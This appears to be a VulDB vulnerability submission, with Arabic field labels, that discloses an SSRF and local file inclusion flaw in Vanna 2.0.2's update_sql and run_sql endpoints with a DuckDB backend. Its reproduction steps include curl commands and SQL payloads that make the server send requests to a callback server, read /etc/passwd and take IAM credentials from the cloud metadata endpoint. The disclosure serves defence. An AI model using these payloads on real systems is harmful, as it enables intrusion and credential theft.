| عنوان | vanna-ai Vanna 2.0.2 Server-Side Request Forgery (CWE-918) |
|---|
| الوصف | # Technical Details
A Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerability exists in the `update_sql` and `run_sql` endpoints in `src/vanna/legacy/flask/__init__.py` of Vanna when using DuckDB as the database backend.
An unauthenticated attacker can inject arbitrary SQL containing DuckDB built-in file/HTTP functions (read_csv, read_csv_auto, read_text, read_blob) via the /api/v0/update_sql endpoint, and then trigger execution via /api/v0/run_sql. This causes the server to make HTTP requests to attacker-controlled or internal URLs (SSRF), or read arbitrary local files (LFI) and return the contents to the attacker.
# Vulnerable Code
File: src/vanna/legacy/flask/__init__.py (line 604-648)
Method: update_sql endpoint + run_sql endpoint
Why: The update_sql endpoint stores attacker-supplied SQL without validation. DuckDB provides built-in functions like read_csv('http://...'), read_text('/etc/passwd'), read_blob('/etc/shadow') that can make HTTP requests and read local files. All payloads are valid SELECT statements that bypass the is_sql_valid() check. The default NoAuth configuration requires no authentication.
Data flow: POST /api/v0/update_sql -> cache.set(sql) -> GET /api/v0/run_sql -> vn.run_sql(sql) -> DuckDB conn.query(sql).to_df() -> DuckDB processes read_csv('http://...') -> SSRF
# Reproduction
1. Start Vanna server with DuckDB backend (default NoAuth)
2. Start attacker callback server: python3 -m http.server 18877
3. SSRF attack: curl -X POST "http://localhost:8084/api/v0/update_sql" -H "Content-Type: application/json" -d '{"id":"ssrf-test","sql":"SELECT * FROM read_csv_auto(\\u0027http://127.0.0.1:18877/probe.csv\\u0027)"}' then curl "http://localhost:8084/api/v0/run_sql?id=ssrf-test" — DuckDB sends HTTP request from server
4. LFI attack: inject sql "SELECT * FROM read_text('/etc/passwd')" — returns full file contents via API response
5. Cloud metadata theft: inject sql with read_csv_auto('http://x.x.x.x/latest/meta-data/iam/security-credentials/') — steals IAM credentials on AWS
# Impact
- SSRF: Server sends HTTP requests to arbitrary internal/external URLs (cloud metadata, internal APIs)
- Local File Inclusion: Read arbitrary files from server filesystem (/etc/passwd, secrets, configs)
- Cloud Account Takeover: Steal IAM credentials via metadata endpoint (x.x.x.x)
- Information Disclosure: Exfiltrate sensitive data through API responses |
|---|
| المصدر | ⚠️ https://gist.github.com/YLChen-007/574542015755951ee1d53206022cc754 |
|---|
| المستخدم | Eric-y (UID 95889) |
|---|
| ارسال | 04/03/2026 08:54 AM (2 أشهر منذ) |
|---|
| الاعتدال | 15/03/2026 07:45 PM (11 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 351154 [vanna-ai vanna حتى 2.0.2 Endpoint __init__.py update_sql/run_sql تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|